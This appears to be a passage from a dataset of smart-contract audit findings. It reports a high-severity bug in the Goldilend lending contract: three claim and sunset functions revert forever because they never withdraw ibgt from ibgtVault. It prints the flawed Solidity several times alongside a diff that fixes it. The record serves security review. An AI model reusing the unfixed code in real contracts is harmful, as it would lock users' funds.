```\\n function deposit(uint256 amount) external {\\n deposits[msg.sender] += amount; //@audit no need\\n _moveDelegates(address(0), delegates[msg.sender], amount);\\n SafeTransferLib.safeTransferFrom(locks, msg.sender, address(this), amount);\\n _mint(msg.sender, amount);\\n }\\n\\n /// @notice Withdraws Locks to burn Govlocks\\n /// @param amount Amount of Locks to withdraw\\n function withdraw(uint256 amount) external {\\n deposits[msg.sender] -= amount; //@audit no need\\n _moveDelegates(delegates[msg.sender], address(0), amount);\\n _burn(msg.sender, amount);\\n SafeTransferLib.safeTransfer(locks, msg.sender, amount);\\n }\\n```\\n
Some functions of `Goldilend` will revert forever.
high
`Goldilend.multisigInterestClaim()/apdaoInterestClaim()/sunsetProtocol()` will revert forever because they don't withdraw `ibgt` from `ibgtVault` before the transfer.\\n```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n\\nAs `ibgtVault` holds all of `Goldilend`'s `ibgt`, these functions should withdraw from `ibgtVault` first.
3 functions should be changed like the below.\\n```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n+ iBGTVault(ibgtVault).withdraw(interestClaim);\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n+ iBGTVault(ibgtVault).withdraw(interestClaim);\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n+ iBGTVault(ibgtVault).withdraw(poolSize - outstandingDebt);\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n
`Goldilend.multisigInterestClaim()/apdaoInterestClaim()/sunsetProtocol()` will revert forever.
```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n